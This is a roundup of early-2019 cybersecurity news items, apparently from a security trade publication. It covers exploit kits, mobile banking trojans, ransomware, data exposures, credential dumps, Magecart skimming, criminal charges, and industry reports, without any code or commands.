The new year is a time for resolutions and promises of change, so much so that even malware has returned from a bit of time off with some new features, including a new Flash exploit, according to Malwarebytes head of investigations, Jérôme Segura.
The Fallout exploit kit (EK) took a little respite over the first few weeks of 2019, but it has returned, this time using CVE-2018-15982, along with HTTPS support, a new landing page format, and Powershell to run its payloads. In addition, Seguara said the team has seen an increase in RIG EK campaigns, which he suspects might have been an effort to fill that temporary void.
As the malware has returned to business, it continues to spread using malvertising chains. In September 2018, FireEye wrote that the Fallout EK was discovered affecting mostly countries in the Asia Pacific region. Though it did distribute SmokeLoader in Japan, the malware then shifted to dropping GandCrab in the Middle East.
When the malware was detected again in October 2018, the EK was being used in the HookAds campaign, which delivered victims to a fraudulent dating page, according to Malware-Traffic-Analysis.net, which also noted that the first payload was the Minotaur ransomware, followed by AZORult during the second and third runs.
Since Fallout EK's return, Malwarebytes researchers have discovered the malware is delivering the GandCrab ransomware, though it delivers its payload via Powershell, as opposed to iexplore.exe. “This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload,” Segura wrote.
"What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques," he continued. "In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proofs of concept. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer.”
Malicious code was lurking about in two different apps within the Google Play store, according to researchers at Trend Micro who have disclosed that they discovered a banking Trojan in what seemed like legitimate apps.
Both the currency converter and the battery-saving app have been removed from Google Play, but not before they were downloaded thousands of times. The battery app, BatterySaverMobi, even had 73 reviews resulting in a 4.5 star rating, making it appear all the more legitimate.
“We looked into this campaign and found that the apps dropped a malicious payload that we can safely link to the known banking malware Anubis (detected by Trend Micro as ANDROIDOS_ANUBISDROPPER ). Upon analysis of the payload, we noted that the code is strikingly similar to known Anubis samples. And we also saw that it connects to a command and control (C&C) server with the domain aserogeege.space, which is linked to Anubis as well,” researchers wrote.
The apps were reportedly able to evade detection by using the device's motion sensor data.
The malware authors assume that the device is scanning for malware, so they created an emulator with no motion sensors that monitors the user’s steps so that they check for sensor data to determine whether the app is running in a sandbox environment. If it is, the malicious code does not run.
If it does run, though, the user receives a fraudulent prompt, alerting them that a system update is available.
“Here’s more proof that criminals are following users to mobile devices and investing more time and effort in attempting to exploit them. As hard as organizations might work to secure their customers’ mobile experiences, attackers work just as hard to innovate and find ways to take advantage,” said Sam Bakken, senior product marketing manager, OneSpan.
“This is why it’s imperative to give app developers a leg up with one-stop mobile app security tools that allow them to build security into mobile apps from the start, which will save them time and effort and save financial institutions and other purveyors of high-value mobile services money in terms of reduced fraud and maintaining consumer trust in their brand. In addition, meeting attackers’ innovations with mobile app security innovations such as App Shielding – which proactively detects and defends against a variety of nefarious activities executed by mobile banking Trojans such as this one – is another step in the right direction for what will be an ongoing battle.”
A new strain of yet another ransomware campaign has been discovered in which the malicious actors have expanded payment options beyond Bitcoin; they are instead offering alternatives (such as PayPal) that include a phishing link, according to MalwareHunterTeam.
Attackers are stealing a page from Daedalus and are killing two birds with one stone by including a link to make a payment. To obtain the decryption key, victims can follow the link to the PayPal phishing page, where their login credentials are stolen. The combination of two threat vectors makes this attack particularly dangerous for unsuspecting victims.
The new attack method combines “a ransom note that direct victims to a PayPal phishing page...Clicking on the Buy Now button, it directs to the credit card part of the phish already (so the login part is skipped). After filling & clicking Agree comes the personal info part & then finished,” the team tweeted. Once that payment is processed, the victim receives a confirmation.
For victims who pay with Bitcoin, the threat actors also requested that victims send an email with a reference number, which is provided in the ransom.
“Malicious actors are continually becoming more sophisticated. With this particular campaign involving phishing as an immediate follow-up threat vector to the ransomware, this attack has the potential to cause significant harm,” said DomainTools’ senior security adviser, Corin Imai.
“Not only will victims be dealing with the impact of ransomware, but many will also be directed to a carefully crafted phishing site that will attempt to steal their credentials. As seen in past attacks, ransomware campaigns have targeted individuals with the threat of releasing compromising content or rendering their computers useless, leaving victims feeling that they have no choice but to pay up. The best advice in this scenario is to be hyper-vigilant, double-check URLs, and when in doubt, don’t click.”
The third annual CyberFirst Girls competition will kick off on Monday as GCHQ looks to help address a chronic gender imbalance and skills shortage in the industry.
Over the past two years, the intelligence service’s National Cyber Security Centre (NCSC) has managed to attract 12,500 female pupils from schools across the UK to take part.
Teams of up to four plus a teacher or mentor can enter, with girls in Year 8 in England and Wales, S2 in Scotland and Year 9 in Northern Ireland (12-13-years-old) able to participate.
They’ll face a week of online challenges in four key areas — cryptography, cybersecurity, logic and coding and networking — with the top 10 teams competing face-to-face at a grand final in Edinburgh in March.
Participants are also able to apply for a place on CyberFirst Girls Defenders: free four-day residential and non-residential courses taking place in April-May and designed to teach further skills in how to build and protect small networks and personal devices.
James Hadley, CEO of Immersive Labs, welcomed the initiatives as helping to encourage a new generation of cybersecurity talent.
"In my experience, men and women have distinctly different approaches to problem-solving in cyber. Women are typically more methodical — which allows them to take a long-term and determined approach to finding a resolution and complements men's slightly faster-moving approach,” he added.
“In the long term, this initiative will also set the groundwork for building a network of like-minded people to encourage and support one another when starting out in the space.”
Attracting more gender diversity into the information security industry has been a challenge for years. Today just 24% of the global workforce are women, yet the sector as a whole suffers from shortages reaching nearly three million professionals.
Government figures published in December last year claimed that over half (57%) of all UK firms and charities have a “basic technical cybersecurity skills gap.”
It’s a situation predicted to get worse if the UK leaves the European Union as it has signaled this year.
Last month, the government released a new skills strategy in an effort to reduce skills shortfalls and promised new UK Cyber Security Council will receive £2.5m of public funding to help in its mission to “lay the structural foundations” of the profession.
However, it has been criticized in the past by MPs, for failing to address the immediate challenges facing businesses in the critical national infrastructure sector.
Facebook has removed hundreds of fake Pages and accounts after spotting a coordinated effort by Russian state-linked actors to spread disinformation in Ukraine and other former Soviet countries.
There were two linked campaigns: the first targeting Romania, Latvia, Estonia, Lithuania, Armenia, Azerbaijan, Georgia, Tajikistan, Uzbekistan, Kazakhstan, Moldova, Russia and Kyrgyzstan.
Although purporting to be independent or general interest Pages on topics ranging from weather and travel to politics, they were actually run by employees of Kremlin news agency Sputnik, according to Facebook’s head of cybersecurity policy, Nathaniel Gleicher.
The 289 fake Pages and 75 spoof accounts posted disinformation on local corruption and protests, and anti-NATO sentiment, spending $135,000 on ads, hosting 190 events and attracting 790,000 followers.
Facebook also removed 107 Pages, Groups and accounts and 41 Instagram accounts for similar “coordinated inauthentic behavior” targeting Ukrainians. Account holders pretended to be regular Ukrainian netizens, attracting 180,000 followers and spending $25,000 on ads.
This campaign apparently shared similar characteristics to the disinformation blitz carried out by the Internet Research Agency (IRA) ahead of the US mid-terms last year and the 2016 presidential election.
“We’re taking down these Pages and accounts based on their behavior, not the content they post. In these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action,” said Gleicher.
“While we are making progress rooting out this abuse, as we’ve said before, it’s an ongoing challenge because the people responsible are determined and well-funded.”
The accounts effectively promoted Sputnik content and that of its parent company, state-run Rossiya Segodnya, whilst hiding its true source. The effect was to increase Sputnik’s reach in the countries covered by 170%, according to the Digital Forensic Research Lab.
“Most posts were apolitical, but some, especially in the Baltic States, were sharply political, anti-Western, and anti-NATO,” the body said.
Things could be about to get even worse for Huawei after a report claimed the US Department of Justice is readying an indictment against the firm for IP theft against global partner companies.
One of these is T-Mobile. That case has already been tried in a civil court in 2017, with a federal jury in Seattle siding with the US mobile carrier in finding Huawei liable for the theft of robotic technology it was developing.
The incident happened in 2014, when a Huawei engineer stole part of T-Mobile’s smartphone testing “Tappy” robot, whilst visiting its Bellevue lab as an industry partner.
Now the DoJ is reportedly flexing its muscles, with a criminal investigation into more widespread IP theft by the Shenzhen giant. An indictment could come soon, a person familiar with the matter told the WSJ.
It comes as CFO and daughter of Huawei’s founder, Meng Wanzhou, remains under house arrest in Vancouver awaiting extradition to the US.
This is said to be linked to another criminal investigation, into whether she conspired to trick US banks into unwittingly breaking sanctions on Iran by claiming Huawei subsidiary Skycom was a separate business.
All this comes as governments around the world continue to reassess whether Huawei represents a national security risk as a provider of 5G network equipment.
Although it has protested its innocence on numerous occasions, claiming it’s a victim of geopolitics, the US, New Zealand, Australia, Japan and others have banned or are restricting the firm.
In Poland, the government is mulling whether to change the law to do the same after a sales director in the country was arrested on suspicious of spying.
The German government this week became the latest to consider a ban on Huawei 5G products on national security grounds.
With 5G set to play a key role in critical infrastructure for years to come, the fear is that Huawei may be forced to do the bidding of the Chinese government in the future to provide it with a strategic advantage.
An attack leveraging the open-source Build Your Own Botnet (BYOB) framework has reportedly been intercepted by Israeli cybersecurity firm Perception Point’s incident response team. According to the team, this appears to be the first time the BYOB framework has been found to be used for fraudulent activity in the wild.
While these tactics and techniques have historically been limited in used to financially backed advanced persistent threat (APT) groups, they are now more easily accessed by novice criminals, in part because of the more widespread popularity of plug-and-play hacking kits, researchers said.
In July, a BYOB framework that implements all the building blocks needed to build a botnet was developed to improve cybersecurity defenses; however, what is used by defense can also fall into the hands of those with more malicious intentions. The continued growth of these hacking kits allows any script kiddie or malicious attacker to leverage this framework and carry out attacks that otherwise wouldn’t be possible.
According to the team’s email analysis, victims received an email with an HTML attachment containing both a link to a phishing site impersonating the Office 365 login page and script code that automatically downloaded malware to the victim’s computer. The payload then awaits command after connecting to the attackers server.
Credit: Perception Point
“The attack we intercepted was a targeted email attack against one of our clients. It was distributed via the email channel so the extent of it is to whomever the attacker chose to send it to. The nature of the tool [BYOB] used in the attack is mass remote control; therefore, we presume that this wasn't a single email sent, and we expect that others might have been compromised by this attack as well,” said Shlomi Levin, co-founder and CTO, Perception Point.
“The attack was easily prepared using the BYOB framework; hence, it doesn't cost the attacker much investment, so I would expect to see more BYOB used in the future.”
Despite a 28% decrease in cybersecurity startups during 2017, global venture capital funding for cybersecurity rebounded with record high investments, according to Strategic Cyber Ventures.
Though last year saw $5.3 billion in cybersecurity global ventures, Strategic Cyber Ventures called this an unsustainable investment rate.
Over half of cybersecurity founders of new startups have more than a decade of executive or entrepreneurial experience, as opposed to the past two years in which there was nearly an even split between experienced founders and less-seasoned founders, the report found.
In fact, 2018 was the fifth consecutive year in which Israel enjoyed increasing round sizes at the seed stage. Additionally, the amount of funding across all stages increased, keeping the recent trend of fewer companies raising larger amounts of capital moving forward.
Though there were emerging fields among new startups in 2018, including cybersecurity solutions for cryptocurrencies and software-defined perimeter (SDP), the most overwhelmingly funded field across all stages was internet of things (IoT) security. Though most startups were within the SCADA and medical devices sub-domains, other emerging fields included threat detection, security operations, data protection and cloud security.
Nevertheless, the report said, “In cybersecurity, there are likely many zombies out there. They’ve raised big rounds, growth has slowed, perhaps due to vendor fatigue or increased competition, and now these companies can’t raise at increased valuations from prior rounds, or at all, and are being propped up by existing investors that will eventually grow weary of keeping them alive. These companies will eventually float to the surface over the next few years with less than desirable outcomes for investors and founders.”
According to Chris Ahern, principal, Strategic Cyber Ventures, "We’ve seen massive funds formed over the past few years and some of that money is making its way to cybersecurity deals. Second, we’ve seen some strong exits in the space through IPOs and M&A over the last couple of years."
The problems aren’t going away. 2018 had several massive, high-profile breaches and we’ll continue to see this into 2018 as well as a continued discussion around privacy. The real question is whether it’s a good thing that 2018 was a record year for cybersecurity investment.”
Another California-based communications provider has announced a potential security incident, as VOIPo confessed that it left a database containing seven million call logs, six million text messages and other internal documents containing unencrypted passwords unprotected without a password.
After security researcher Justin Paine notified the company, he wrote, “This database was promptly secured after I notified the company. I would like to thank VOIPo for their quick assistance in securing this data.”
In the security notice shared with customers, VOIPo wrote: “We were made aware of a development server that was exposed for a small window of time. When it was discovered, it was taken offline within 15 minutes of being notified by Cloudflare that they had discovered it. It primarily had some data for database load testing made up of call logs (partial numbers only), SMS messages our system flagged as SPAM and some general server log data."
VOIPo said the dev server was isolated and no other network was at risk because additional production systems are firewalled so that any connection to those systems would not have been possible. However, these statements have been called "misleading" on Twitter.
The VOIPo database reportedly had been exposed since June 2018 and contains call and message logs dating back to May 2015. The news comes only two months after a database misconfiguration at San Diego–based Voxox leaked 26 million text messages. As was the case in the Voxox breach, if text messages containing two-factor authentication (2FA) codes or password reset links were intercepted, they could have allowed the attacker to hijack a user’s account.
“It does not take much for outsiders to find unsecured databases and access sensitive information,” said Stephan Chenette, CTO and co-founder, AttackIQ. “In fact, there are now tools designed to detect misconfigurations within cloud tools like Amazon's S3. Misconfigured security controls are an all-too-common problem. Organizations are increasingly struggling with limited and under-trained IT resources that lead to using default account passwords, unpatched systems and poorly configured network devices.”
Although VOIPo claims there is no evidence to indicate a breach occurred, “the company cannot guarantee that no unauthorized users accessed the data, especially since it was left unsecured and easily available for months,” said Ruchika Mishra, director of products and solutions, Balbix.
The vast majority of senior decision makers across the globe expect data theft and cyber-disruption to increase in 2019, according to the latest report from the World Economic Forum (WEF).
The annual Global Risks Report for 2019 uses interviews with risk experts, business leaders, academics and others to better understand the challenges facing the world economy.
Rising dependency on technology ensured cyber-related risk remained front-of-mind for respondents, both in the near and long-term.
Some 82% said they expect data and monetary theft attacks to increase in 2019, while 80% said the same for cyber-related disruption to operations and infrastructure.
A slightly smaller number anticipated an increase in fake news (69%), personal identity theft (64%) and loss of privacy to companies (63%).
Over the next decade, respondents placed data fraud/theft and cyber-attacks fourth and fifth in terms of most likely risks, while cyber-attacks and “critical information infrastructure breakdown” were placed seventh and eighth in terms of biggest potential impact.
“There were further massive data breaches in 2018, new hardware weaknesses were revealed, and research pointed to the potential uses of artificial intelligence to engineer more potent cyber-attacks,” the report noted. “Last year also provided further evidence that cyber-attacks pose risks to critical infrastructure, prompting countries to strengthen their screening of cross-border partnerships on national security grounds.”
Veeam’s regional VP for UK & Ireland, Mark Adams, claimed the report highlights the continued need for investment in cyber-threat mitigation.
“Spending time and money on thorough cybersecurity and disaster recovery planning is no longer evidence of being overly paranoid,” he added. “When disaster strikes, whether from a data breach or service outage, having these kinds of measures in place to rely on is what will separate successful businesses from struggling ones.”
However, the findings show a slight change from last year’s report, which listed cyber-attacks as the third most likely global risk.
Millions of sensitive files dating back decades have been exposed after 3TB of data on a storage server was left publicly exposed by the Oklahoma Securities Commission.
Researchers at UpGuard made the discovery on December 7 last year and it was fixed a day later by the commission, part of the state’s Department of Securities which regulates and administers the trading securities sector.
It was first registered as publicly accessible by Shodan a week earlier.
“The data was exposed via an unsecured rsync service at an IP address registered to the Oklahoma Office of Management and Enterprise Services, allowing any user from any IP address to download all the files stored on the server,” explained the security vendor.
“The website for the Securities Commission has an UpGuard Cyber Risk score of 171 out of 950, indicating severe risk of breach. Among the issues lowering the website’s score is the use of the web server IIS 6.0, which reached end of life in July 2015, meaning no updates to address any newly discovered vulnerabilities have been released in the last three and a half years.”
The data, which dated back to 1986 and included email back-ups and virtual images, covered a broad sweep of different areas.
These included personal information such as the Social Security numbers of 10,000 brokers, and highly sensitive life insurance information on terminally ill AIDS patients.
Also exposed were system credentials which could allow an attacker to hijack Department of Securities workstations, third-party security filings, and accounts with Thawte, Symantec Protection Suite, Tivoli and others.
The leaked data also included “spreadsheets documenting the timeline for investigations by the FBI and people they interviewed,” potentially putting witnesses at risk.
“We need to stop making it so easy for hackers and bad actors who are simply using tools that have been around for years,” argued Suzanne Spaulding, Nozomi Networks adviser and former DHS under secretary.
“Hackers use a tool called Shodan that allows anyone to scan the internet, looking for devices and computers, connected to the internet, but not protected.”
A leading security researcher has warned of a major trove of breached data being shared on hacking sites, containing over 772 million unique email addresses and more than 21 million unique passwords.
Troy Hunt, owner of the Have I Been Pwned (HIBP) breached credentials site, explained that he was alerted to the collection of 12,000 files hosted on the MEGA cloud service last week.
Although the 87GB dump was subsequently removed, he was also notified of it being shared on a hacking forum under the moniker “Collection #1.”
The total collection amounted to nearly 2.7 billion rows comprised of credentials stolen from thousands of sources in multiple breaches, said Hunt.
After cleaning up the data, he reduced this figure to 772.9 million emails — the largest ever to be loaded into HIBP — and 21.2 million dehashed passwords.
“Whilst there are many legitimate breaches that I recognise in that list, that's the extent of my verification efforts and it's entirely possible that some of them refer to services that haven't actually been involved in a data breach at all,” Hunt explained.
“However, what I can say is that my own personal data is in there and it's accurate; right email address and a password I used many years ago. Fortunately, only passwords that are no longer in use, but I still feel the same sense of dismay that many people reading this will when I see them pop up again. They're also ones that were stored as cryptographic hashes in the source data breaches … but have been cracked and converted back to plain text.”
Hunt encouraged users to check whether their emails and passwords are affected, by visiting HIBP. However, they’ll have to search separately for them as the site doesn’t store paired credentials together for security reasons.
The likelihood is the data could be fed into credential stuffing programs to automatically try to unlock accounts over multiple other sites.
Hunt recommended users get a password manager to store long-and-strong unique credentials for each site.
“A password manager is also a rare exception to the rule that adding security means making your life harder,” he said.
A malicious MS Word document, titled “eml_-_PO20180921.doc,” has been found in the wild, and according to researchers at Fortinet's FortiGuard Labs, the document contains auto-executable malicious VBA code.
Victims who receive and open the document are prompted with a security warning that macros have been disable. If the user then clicks on “enable content,” the NanoCore remote access Trojan (RAT) software is installed on the victim’s Windows system.
According to FortiGuard Labs, the NanoCore RAT was developed in the .Net framework back in 2013. Despite its continued use, the author was convicted by the FBI and sentenced to nearly three years in prison. Researchers captured a sample of this latest version (18.104.22.168), which uses NanoCore to execute malicious behavior.
Spreading through phishing campaigns that dupe victims into opening the document, the malware is downloaded from www.wwpdubai.com. Once executed, the VBA code downloads and saves an EXE file from the URL.
“I loaded CUVJN.exe with the .Net debugger dnSpy. Tracing from its main function, we can see that it loads numerous data blocks from its resource section, and then puts them together and decrypts them,” wrote researcher Xiaopeng Zhang.
In order to trace the main functions, researchers loaded CUVJN.exe with the .Net debugger dnSpy and found that it loads, puts together and then decrypts multiple data blocks from its resource section in order to get to a new PE file.
“According to my analysis, the decrypted .Net program is a daemon process. Let’s continue to trace it from its main() function. At first, it creates a Mutex and checks if the process already exists to ensure only one process of this program is running. Next, it checks if Avast is running on the victim’s system by detecting whether the “snxhk.dll” module is loaded or not. If so, it keeps waiting until it has been unloaded. Avast is an AntiVirus software, and “snxhk.dll” is one of its modules,” Zhang wrote.
Unfortunately, .dll is a daemon process, which Zhang said he was not able to kill because it has a “ProtectMe” class, though he does provide steps for removing the malware.
Players who love to indulge in online battle should heed caution when playing Fortnite, according to researchers at Check Point who have disclosed vulnerabilities that could give a malicious actor access to a user’s account and their V-Bucks.
In addition to gaining full access to a user’s account, an attacker who exploited the vulnerability – which has now been fixed – could have eavesdropped on a player’s in-game conversations, potentially also picking up any sounds in the background where the game was being played, researchers said.
According to today’s press release, an attacker could have stolen login credentials by exploiting three flaws found in the web infrastructure of Epic Games, specifically in compromised sub-domains through which the malicious actor could intercept authentication tokens.
The attack, which reportedly could be executed in a single click, would grant an attacker the ability to purchase virtual in-game currency using the victim’s payment card details and then be sold for real money outside the game.
“Researchers were able to demonstrate the token-based authentication process used in conjunction with Single Sign-On (SSO) systems such as Facebook, Google and Xbox” and reported the vulnerability to Epic Games, the press release stated.
“Fortnite is one of the most popular games played mainly by kids. These flaws provided the ability for a massive invasion of privacy,” said Oded Vanunu, head of products vulnerability research for Check Point in a press release.
“Together with the vulnerabilities we recently found in the platforms used by drone manufacturer DJI, show how susceptible cloud applications are to attacks and breaches. These platforms are being increasingly targeted by hackers because of the huge amounts of sensitive customer data they hold. Enforcing two-factor authentication could mitigate this account takeover vulnerability,” continued Vanunu.
Still, Check Point advised players to remain vigilant and use discretion when sharing information online and cautioned that because of the increasing popularity and success of phishing campaigns, players should keep in mind that there are many dubious and dangerous links that should not be trusted.
Two security researchers working independently on different projects have discovered multiple vulnerabilities that affect multiple web hosting platforms, including the popular Bluehost, as well as Amadeus, the online reservation system used by several different airlines.
According to independent security researcher Paulos Yibelo, Bluehost, a popular web hosting platform, was riddled with vulnerabilities, including one that would allow complete account takeover.
Rated as having a high severity, the vulnerabilities grant attackers access to personally identifiable information, partial payment information and tokens that grant access to sites like WordPress, Website Planet wrote. In addition to those bugs discovered in BlueHost, Yibelo also reported several bugs in other web hosting platforms, including Dreamhost, HostGator, OVH, and iPage.
“This should serve as a warning call for those companies authenticating customers online with legacy technology. Today, account takeover is not a hard attack to deploy, and the consequences can be devastating with bad actors stealing money and products,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.
In related news, security researcher Noam Rotem, who was working with Safety Detective research lab, discovered a major vulnerability in Amadeus, an online booking system used by nearly half (44%) of all airlines worldwide, including United Airlines, Lufthansa, Air Canada, and many more, according to a January 15 blog post.
After receiving a message to check the passenger name record (PNR), the researchers were able to view any PNR and access customer data.
“With the PNR and customer name at our disposal, we were able to log into ELAL’s customer portal and make changes, claim frequent flyer miles to a personal account, assign seats and meals, and update the customer’s email and phone number, which could then be used to cancel/change flight reservation via customer service,” the researchers wrote.
A malicious actor would need to have a working knowledge of the PNR code in order to exploit the vulnerability, which has since been fixed.
Researchers have uncovered a twelvth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain.
RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.
This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.
This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.
This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.
Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.
Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.
Two Ukrainian nationals have been charged with hacking into the Securities and Exchange Commission (SEC) and stealing sensitive information for use in insider trading.
Artem Radchenko, 27, and Oleksandr Ieremenko, 26, both from Kiev, were charged with 16 counts including securities fraud conspiracy, wire fraud conspiracy, computer fraud conspiracy, wire fraud and computer fraud.
They’re alleged to have targeted the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, which stores documents related to company disclosures including test filings made before announcements go public.
These filings often contain information similar to that of the official final filing, meaning the two alleged hackers could get their hands on sensitive info before it went public to gain an advantage on the markets.
They’re alleged to have used a variety of tactics to obtain unauthorized access to the EDGAR servers, including directory traversal, phishing and malware. They’re then said to have copied the information to a server in Lithuania.
The Ukrainians recruited traders to their scheme, who used the stolen information to make over $4m in profits, according to the Department of Justice.
For example, they’re alleged to have bought up $2.4m worth of shares in a public company based on information contained in a stolen test filing about its upcoming financials. They then sold these shares for a $270,000 profit over the next day after the company announced it expected record earnings for 2016.
“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said assistant attorney general Brian Benczkowski. “The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”
The charges carry a potential maximum sentence of 25 years behind bars and $500,000 fine, or twice the gain or loss from the relevant offenses.
Ieremenko has been in trouble before, charged in 2015 for his part in an international conspiracy to hack and steal non-public sensitive market information from three newswire organizations, using the same techniques.
A total of 10 defendants have been charged as part of the latest conspiracy.
The UK’s National Cyber Security Centre (NCSC) has urged organizations still on Windows 7 to plan now for the end of extended support in a year’s time.
The GCHQ arm reminded IT managers that the operating system will no longer receive free updates from January 14 2020.
That will mean any machines still running then could be exposed to a greater risk of malware, and potentially unreliable systems.
The NCSC drew parallels with the end-of-support for Windows XP in 2014.
“It wasn’t long after that before exploitation of the final version of the platform became fairly widespread. Malware can spread much more easily on obsolete platforms because, without security updates, known vulnerabilities will remain unpatched. As a result, it’s crucial to move away from them as quickly as possible,” it explained.
“We know there are costs involved in keeping up to date. However, doing so is one of the most effective ways of keeping your networks and devices secure - this is why planning your upgrades far in advance is especially important.”
For organizations unable for any reason to migrate swiftly to Windows 10 — for example if there are compatibility issues with legacy software — the NCSC has listed a few key short-term recommendations.
These include preventing access to untrusted services and removable media, converting systems to thin clients, removing access for remote workers and applying anti-malware and intrusion detection tools.
For those businesses keen to remain on Windows 7 beyond January 14 2020, Microsoft is also offering Extended Security Updates (ESUs) which will be costed per device and increase in costs every year until January 2023.
Another option is to buy the Windows Virtual Desktop service, virtualizing Windows 7 on Azure VMs. This option comes with free ESUs but will also be available only for three years.
Despite the burgeoning IoT market, organizations made limited progress on IoT security in 2018, according to a new report from Gemalto. Though there is evidence of incremental improvements, security measures are being outpaced by the rapid growth of IoT, which is on track to hit 20 billion devices by 2023.
The survey queried 950 IT and business decision-makers with awareness of IoT in their organization in 2018. Of those, only 48% of companies said that they have the ability to detect whether their IoT devices have suffered a breach; however, 90% of respondents believe that security is a major concern for their customers.
According to the report, more than half (54%) of consumers fear that their privacy may be compromised with IoT devices, yet only 14% of the survey participants see protecting customer privacy by security IoT devices as an ethical responsibility.
“Given the increase in the number of IoT-enabled devices, it’s extremely worrying to see that businesses still can’t detect if they have been breached,” said Jason Hart, CTO, data protection at Gemalto, in a press release. “With no consistent regulation guiding the industry, it’s no surprise the threats – and, in turn, vulnerability of businesses – are increasing. This will only continue unless governments step in now to help industry avoid losing control.”
More than a third (38%) of participants said they experience privacy challenges associated with collecting large amounts of IoT data. Still, more organizations have started using passwords to protect IoT devices. While 63% of organizations said they used passwords in 2017, the number of positive responses rose to 66% in 2018.
Businesses are clearly feeling the pressure of protecting the growing amount of data they collect and store,” Hart said. “But while it’s positive they are attempting to address that by investing in more security, such as blockchain, they need direct guidance to ensure they’re not leaving themselves exposed. In order to get this, businesses need to be putting more pressure on the government to act, as it is them that will be hit if they suffer a breach.”
Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.
“The first step in addressing the issue, was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”
As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.
After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.
At the time of writing this, the website for the city of Del Rio was up and running, though there is no word on the full scope of the attack. Infosecurity has contacted the city, and this story will be updated with any response.
“The growing number of exploit kits and malware at their disposal is emboldening malicious actors to attack organizations with a rich trove of consumer data,” said Mike Bittner, digital security and operations manager at The Media Trust.
“Government organizations, in particular city governments, are prime targets; they not only process a lot of citizen and business data but are also less secure as tighter budgets severely limit what IT updates they can carry out. Bad actors have no doubt put the 89,000 local governments across the country in their cross hairs. It is just a matter of time before many of these governments realize they’ve been hacked.”